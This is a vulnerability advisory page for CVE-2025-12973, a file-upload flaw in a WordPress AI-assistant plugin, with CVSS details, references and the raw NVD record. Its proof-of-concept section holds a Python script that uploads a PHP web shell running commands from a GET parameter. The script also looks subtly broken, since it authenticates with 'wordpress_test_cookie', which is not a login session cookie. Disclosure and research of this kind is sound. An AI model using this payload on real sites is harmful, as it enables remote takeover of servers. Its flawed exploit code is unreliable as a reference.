CVE-2025-12973

Description

The S2B AI Assistant – ChatBot, ChatGPT, OpenAI, Content & Image Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the storeFile() function in all versions up to, and including, 1.7.8. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

S2B AI Assistant < 1.7.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'
cookie = sys.argv[2] if len(sys.argv) > 2 else ''

files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream')}
data = {'action': 's2b_store_file'}

response = requests.post(f'{target}/wp-admin/admin-ajax.php', files=files, data=data, cookies={'wordpress_test_cookie': cookie})
print(response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12973
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12973
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12973/
[4] VulDB https://vuldb.com/cve/CVE-2025-12973
[5] https://github.com/d0n601/CVE-2025-12973
[6] https://plugins.trac.wordpress.org/browser/s2b-ai-assistant/trunk/lib/helpers/Utils.php
[7] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399267%40s2b-ai-assistant&new=3399267%40s2b-ai-assistant&sfp_email=&sfph_mail=
[8] https://ryankozak.com/posts/cve-2025-12973/
[9] https://www.wordfence.com/threat-intel/vulnerabilities/id/ac9d2b64-aff6-418a-bfe7-ec91b177ad6b?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12973", "sourceIdentifier": "[email protected]", "published": "2025-11-21T17:15:50.267", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The S2B AI Assistant – ChatBot, ChatGPT, OpenAI, Content & Image Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the storeFile() function in all versions up to, and including, 1.7.8. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-12973", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/s2b-ai-assistant/trunk/lib/helpers/Utils.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399267%40s2b-ai-assistant&new=3399267%40s2b-ai-assistant&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-12973/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac9d2b64-aff6-418a-bfe7-ec91b177ad6b?source=cve", "source": "[email protected]"}]}}